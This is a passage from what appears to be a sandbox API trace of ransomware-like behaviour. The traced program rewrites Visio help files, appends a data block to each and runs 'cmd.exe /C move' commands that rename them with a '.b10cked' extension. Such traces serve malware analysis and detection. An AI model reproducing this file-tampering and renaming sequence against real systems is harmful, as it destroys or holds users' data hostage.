lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN") returned 
0x27 [0199.474] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.475] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe78, dwThreadId=0xddc)) returned 1 [0199.490] CloseHandle (hObject=0x1b4) returned 1 [0199.490] CloseHandle (hObject=0x120) returned 1 [0199.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.490] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.490] ReleaseMutex (hMutex=0xf8) returned 1 [0199.490] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25628001662) returned 1 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.491] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x188 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.492] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.493] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x188 [0199.493] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.493] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.493] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xc3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xc3, lpOverlapped=0x0) returned 1 [0199.494] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.494] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xc3, lpOverlapped=0x0) returned 1 [0199.494] SetFilePointer (in: hFile=0x120, lDistanceToMove=-195, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc5 [0199.494] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xc3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xc3, lpOverlapped=0x0) returned 1 [0199.494] SetFilePointer (in: hFile=0x120, lDistanceToMove=-195, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc5 [0199.494] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xc3, lpOverlapped=0x0) returned 1 [0199.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0199.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.SHAPESHEET.14.1033.hxn", cchWideChar=31, lpMultiByteStr=0x132f75c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.SHAPESHEET.14.1033.hxn", lpUsedDefaultChar=0x0) returned 31 [0199.499] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x188 [0199.499] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.499] CloseHandle (hObject=0x120) returned 1 [0199.500] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN") 
returned 0x27 [0199.501] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.501] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd90, dwThreadId=0xd4c)) returned 1 [0199.569] CloseHandle (hObject=0x1b4) returned 1 [0199.569] CloseHandle (hObject=0x120) returned 1 [0199.569] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.569] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.569] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.569] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.569] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.570] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.570] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.570] ReleaseMutex (hMutex=0xf8) returned 1 [0199.570] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.570] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25636088559) returned 1 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.572] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.573] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.574] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.575] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.575] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.575] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_PRM.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_PRM.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0199.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0199.581] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, 